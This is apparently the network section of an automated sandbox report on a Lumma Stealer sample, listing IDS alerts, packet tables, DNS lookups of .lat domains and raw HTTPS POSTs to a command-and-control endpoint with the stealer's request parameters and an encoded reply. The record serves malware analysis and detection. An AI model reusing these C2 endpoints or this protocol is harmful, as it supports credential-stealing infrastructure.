                                                                                                                                            2024-12-20T17:24:58.990580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549732104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:25:02.023218+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549734104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:25:02.023218+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549734104.21.21.99443TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 20, 2024 17:24:42.439557076 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:42.439636946 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:42.439779043 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:42.441071033 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:42.441101074 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:43.662600040 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:43.662668943 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:43.665164948 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:43.665177107 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:43.665510893 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:43.718477011 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:43.737317085 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:43.737349987 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:43.737468958 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.423142910 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.423259974 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.423326015 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.518771887 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.518805981 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.518821001 CET49717443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.518826962 CET44349717104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.631381989 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.631423950 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:44.631498098 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.631788015 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:44.631804943 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:45.850538969 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:45.850636005 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.052490950 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.052520990 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.053087950 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.054379940 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.054406881 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.054481030 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.842817068 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.842883110 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.842920065 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.842938900 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.842961073 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.843000889 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.843038082 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.843040943 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.843059063 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.843086958 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.850872993 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.850919962 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.850919962 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.850933075 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.850970984 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.859198093 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.905977964 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.906001091 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:46.952850103 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:46.962366104 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.015355110 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.034817934 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038480043 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038517952 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038542032 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.038567066 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038611889 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.038619041 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038651943 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038713932 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.038894892 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.038907051 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.038928986 CET49721443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.038934946 CET44349721104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.420166969 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.420190096 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:47.420264006 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.420643091 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:47.420658112 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:48.675702095 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:48.675770998 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:48.677911043 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:48.677920103 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:48.678240061 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:48.679871082 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:48.680026054 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:48.680068970 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:49.585526943 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:49.585642099 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:49.585705996 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:49.585809946 CET49724443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:49.585822105 CET44349724104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:49.847945929 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:49.847994089 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:49.848072052 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:49.848398924 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:49.848417997 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.064935923 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.065025091 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.156884909 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.156907082 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.157460928 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.202881098 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.312495947 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.312586069 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.312654018 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.312697887 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.355331898 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196425915 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196541071 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196728945 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.196814060 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.196826935 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.557282925 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557310104 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.557408094 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557723999 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557734966 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.772991896 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.773139954 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.774579048 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.774591923 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.774837017 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.779197931 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779316902 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779354095 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.779426098 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779437065 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750282049 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750416040 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750514984 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.750711918 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.750735044 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.941735983 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.941772938 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.941879034 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.942203045 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.942214966 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.161359072 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.161438942 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.162674904 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.162683010 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.162882090 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.167085886 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.167166948 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.167171955 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205482006 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205598116 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205656052 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.205857038 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.205881119 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.770459890 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770498991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.770705938 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770939112 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770953894 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.990479946 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.990580082 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.991801023 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.991820097 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.992084980 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.993262053 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.993994951 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994036913 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.994132996 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994163036 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.994869947 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994909048 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995024920 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995059013 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995189905 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995222092 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995359898 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995393991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995403051 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995417118 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995534897 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995557070 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995588064 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995690107 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995716095 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043332100 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043502092 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043548107 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043556929 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043570042 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043587923 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043598890 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043605089 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043607950 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.341968060 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.342070103 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.342174053 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.342289925 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.342303991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.387939930 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.387984037 CET44349734104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.388088942 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.388401985 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.388415098 CET44349734104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:02.023217916 CET49734443192.168.2.5104.21.21.99

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 20, 2024 17:24:42.007546902 CET6291253192.168.2.51.1.1.1
                                                                                                                                            Dec 20, 2024 17:24:42.145601034 CET53629121.1.1.1192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:42.151072979 CET5779553192.168.2.51.1.1.1
                                                                                                                                            Dec 20, 2024 17:24:42.288929939 CET53577951.1.1.1192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:42.292480946 CET5461853192.168.2.51.1.1.1
                                                                                                                                            Dec 20, 2024 17:24:42.433379889 CET53546181.1.1.1192.168.2.5

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 20, 2024 17:24:42.007546902 CET192.168.2.51.1.1.10x4ccbStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                            Dec 20, 2024 17:24:42.151072979 CET192.168.2.51.1.1.10x2a53Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                            Dec 20, 2024 17:24:42.292480946 CET192.168.2.51.1.1.10x4eb9Standard query (0)discokeyus.latA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 20, 2024 17:24:42.145601034 CET1.1.1.1192.168.2.50x4ccbName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Dec 20, 2024 17:24:42.288929939 CET1.1.1.1192.168.2.50x2a53Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Dec 20, 2024 17:24:42.433379889 CET1.1.1.1192.168.2.50x4eb9No error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                                                            Dec 20, 2024 17:24:42.433379889 CET1.1.1.1192.168.2.50x4eb9No error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • discokeyus.lat

                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549717104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:43 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-12-20 16:24:44 UTC1127INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:44 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=5l1cmiuhe0qged7ejojfv7bl6b; expires=Tue, 15 Apr 2025 10:11:23 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sw2aiszGhajzObR3nvnbfbr7r8SrDv%2BrksMocq%2Bnt0o7KKupqBG1guf%2FxpUcHrkjmt4WFU8n7Eu4B9hvY5%2FZt7Ray0rNMnyfN4GKZv3X8ByYdRKl5uTtj1CCxdFsjf7vdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fbfa9e16191e-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1693&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1724748&cwnd=238&unsent_bytes=0&cid=4d5bd0c92d783d9e&ts=775&x=0"
                                                                                                                                            2024-12-20 16:24:44 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-12-20 16:24:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.549721104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:46 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 47
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:46 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                            2024-12-20 16:24:46 UTC1126INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:46 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=gj4uj8619276r9qg3obirpc5hm; expires=Tue, 15 Apr 2025 10:11:25 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITDwHKnYqkEYSyjVKSMEbiQrLAChpvcVqz7cyNAiUa7MXvVw2G6W%2FN6J89QH%2BKHM7IKNn0i4536rQmLkHJRxYPcv%2B8uZw5O7yUVYM02hzoqtjTvLBUZ8tTHwqRbHN0d7mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc08df114340-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2125&rtt_var=808&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1344383&cwnd=217&unsent_bytes=0&cid=50a9bbcb360cbf3d&ts=1002&x=0"
                                                                                                                                            2024-12-20 16:24:46 UTC243INData Raw: 63 35 35 0d 0a 4e 36 73 57 2b 51 63 2b 31 76 65 4e 57 68 2f 69 6f 64 31 4f 72 2b 72 66 6a 65 34 4c 79 6e 57 42 75 30 65 4f 45 59 53 50 31 71 52 4d 69 57 44 62 50 51 72 36 31 66 34 2f 50 64 6a 56 72 7a 76 4b 78 76 33 73 69 69 6e 77 45 2b 44 58 4e 4f 73 39 70 76 6d 37 68 67 33 4e 64 35 56 30 57 2f 72 56 36 43 49 39 32 50 71 6d 62 4d 71 45 2f 62 66 4d 62 71 41 58 34 4e 63 6c 37 33 72 72 2f 37 72 48 58 38 64 78 6b 57 4a 64 73 70 62 68 4e 33 71 48 78 4c 77 6b 77 59 4f 79 35 59 4d 70 35 6c 66 6b 77 57 57 30 4d 38 6e 71 6f 73 56 36 79 6d 57 53 4a 55 50 36 6a 4b 38 2f 63 63 43 62 2f 79 2f 4b 69 4c 50 72 69 6d 43 69 48 65 6e 66 4a 4f 70 37 39 4f 61 77 7a 46 2f 4a 63 70 42 6f 56 4b 61 62 36 7a 42 78 67 63 36 38 62 49 50 49 75 76
                                                                                                                                            Data Ascii: c55N6sW+Qc+1veNWh/iod1Or+rfje4LynWBu0eOEYSP1qRMiWDbPQr61f4/PdjVrzvKxv3siinwE+DXNOs9pvm7hg3Nd5V0W/rV6CI92PqmbMqE/bfMbqAX4Ncl73rr/7rHX8dxkWJdspbhN3qHxLwkwYOy5YMp5lfkwWW0M8nqosV6ymWSJUP6jK8/ccCb/y/KiLPrimCiHenfJOp79OawzF/JcpBoVKab6zBxgc68bIPIuv
